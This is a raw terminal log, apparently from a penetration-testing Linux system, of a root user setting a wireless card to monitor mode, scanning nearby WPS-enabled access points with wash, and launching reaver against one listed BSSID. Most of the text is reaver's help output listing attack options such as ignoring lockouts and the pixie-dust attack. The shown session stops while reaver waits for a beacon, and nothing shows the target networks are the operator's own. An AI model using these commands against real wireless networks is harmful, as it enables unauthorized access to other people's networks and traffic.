- root@D0NTRES0LV5M5:~# ifconfig wlan0 up
- root@D0NTRES0LV5M5:~# ifconfig
- eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
- inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
- inet6 fe80::a00:27ff:febf:3a49 prefixlen 64 scopeid 0x20<link>
- ether 08:00:27:bf:3a:49 txqueuelen 1000 (Ethernet)
- RX packets 4 bytes 930 (930.0 B)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 34 bytes 2668 (2.6 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
- inet 127.0.0.1 netmask 255.0.0.0
- inet6 ::1 prefixlen 128 scopeid 0x10<host>
- loop txqueuelen 0 (Lokale Schleife)
- RX packets 20 bytes 1200 (1.1 KiB)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 20 bytes 1200 (1.1 KiB)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
- ether 00:1f:3f:08:a2:36 txqueuelen 1000 (Ethernet)
- RX packets 0 bytes 0 (0.0 B)
- RX errors 0 dropped 0 overruns 0 frame 0
- TX packets 0 bytes 0 (0.0 B)
- TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
- root@D0NTRES0LV5M5:~# airmon-ng check kill
- root@D0NTRES0LV5M5:~# airmon-ng start wlan0
- PHY Interface Driver Chipset
- phy0 wlan0 carl9170 AVM GmbH Fritz!WLAN N 2.4 [Atheros AR9001U]
- (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
- (mac80211 station mode vif disabled for [phy0]wlan0)
- root@D0NTRES0LV5M5:~# iwconfig
- eth0 no wireless extensions.
- wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Power Management:off
- lo no wireless extensions.
- root@D0NTRES0LV5M5:~# wash -i wlan0mon
- Wash v1.5.2 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- 7C:4F:B5:5F:BC:1B 6 -64 1.0 No WLAN1
- 54:88:0E:D2:64:88 6 -66 1.0 No WLAN2
- D4:21:22:5B:D9:E3 11 -64 1.0 No WLAN3
- B0:48:7A:DB:3F:72 4 -63 1.0 No WLAN4
- [X] ERROR: Failed to open 'wlan0mon' for capturing
- root@D0NTRES0LV5M5:~# iwconfig
- eth0 no wireless extensions.
- wlan0 IEEE 802.11bgn ESSID:off/any
- Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Encryption key:off
- Power Management:off
- lo no wireless extensions.
- root@D0NTRES0LV5M5:~# airmon-ng start wlan0
- PHY Interface Driver Chipset
- phy1 wlan0 carl9170 AVM GmbH Fritz!WLAN N 2.4 [Atheros AR9001U]
- (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
- (mac80211 station mode vif disabled for [phy1]wlan0)
- root@D0NTRES0LV5M5:~# iwconfig
- eth0 no wireless extensions.
- wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Power Management:off
- lo no wireless extensions.
- root@D0NTRES0LV5M5:~# reaver -i wlan0mon^C
- root@D0NTRES0LV5M5:~# reaver -o wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6 -vv
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- Required Arguments:
- -i, --interface=<wlan> Name of the monitor-mode interface to use
- -b, --bssid=<mac> BSSID of the target AP
- Optional Arguments:
- -m, --mac=<mac> MAC of the host system
- -e, --essid=<ssid> ESSID of the target AP
- -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
- -o, --out-file=<file> Send output to a log file [stdout]
- -s, --session=<file> Restore a previous session file
- -C, --exec=<command> Execute the supplied command upon successful pin recovery
- -D, --daemonize Daemonize reaver
- -a, --auto Auto detect the best advanced options for the target AP
- -f, --fixed Disable channel hopping
- -5, --5ghz Use 5GHz 802.11 channels
- -v, --verbose Display non-critical warnings (-vv for more)
- -q, --quiet Only display critical messages
- -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
- -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
- -h, --help Show help
- Advanced Options:
- -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
- -d, --delay=<seconds> Set the delay between pin attempts [1]
- -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
- -g, --max-attempts=<num> Quit after num pin attempts
- -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
- -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
- -t, --timeout=<seconds> Set the receive timeout period [5]
- -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
- -A, --no-associate Do not associate with the AP (association must be done by another application)
- -N, --no-nacks Do not send NACK messages when out of order packets are received
- -S, --dh-small Use small DH keys to improve crack speed
- -L, --ignore-locks Ignore locked state reported by the target AP
- -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
- -n, --nack Target AP always sends a NACK [Auto]
- -w, --win7 Mimic a Windows 7 registrar [False]
- -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
- -1, --p1-index Set initial array index for the first half of the pin [False]
- -2, --p2-index Set initial array index for the second half of the pin [False]
- -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
- -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
- Example:
- reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
- root@D0NTRES0LV5M5:~# reaver -o wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- Required Arguments:
- -i, --interface=<wlan> Name of the monitor-mode interface to use
- -b, --bssid=<mac> BSSID of the target AP
- Optional Arguments:
- -m, --mac=<mac> MAC of the host system
- -e, --essid=<ssid> ESSID of the target AP
- -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
- -o, --out-file=<file> Send output to a log file [stdout]
- -s, --session=<file> Restore a previous session file
- -C, --exec=<command> Execute the supplied command upon successful pin recovery
- -D, --daemonize Daemonize reaver
- -a, --auto Auto detect the best advanced options for the target AP
- -f, --fixed Disable channel hopping
- -5, --5ghz Use 5GHz 802.11 channels
- -v, --verbose Display non-critical warnings (-vv for more)
- -q, --quiet Only display critical messages
- -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
- -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
- -h, --help Show help
- Advanced Options:
- -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
- -d, --delay=<seconds> Set the delay between pin attempts [1]
- -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
- -g, --max-attempts=<num> Quit after num pin attempts
- -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
- -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
- -t, --timeout=<seconds> Set the receive timeout period [5]
- -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
- -A, --no-associate Do not associate with the AP (association must be done by another application)
- -N, --no-nacks Do not send NACK messages when out of order packets are received
- -S, --dh-small Use small DH keys to improve crack speed
- -L, --ignore-locks Ignore locked state reported by the target AP
- -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
- -n, --nack Target AP always sends a NACK [Auto]
- -w, --win7 Mimic a Windows 7 registrar [False]
- -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
- -1, --p1-index Set initial array index for the first half of the pin [False]
- -2, --p2-index Set initial array index for the second half of the pin [False]
- -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
- -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
- Example:
- reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
- root@D0NTRES0LV5M5:~# reaver -i wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- [+] Waiting for beacon from 7C:4F:B5:5F:BC:1B
- ^C